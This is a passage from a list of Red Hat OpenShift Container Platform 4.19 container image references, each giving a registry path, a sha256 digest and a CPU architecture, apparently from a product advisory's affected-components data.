"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
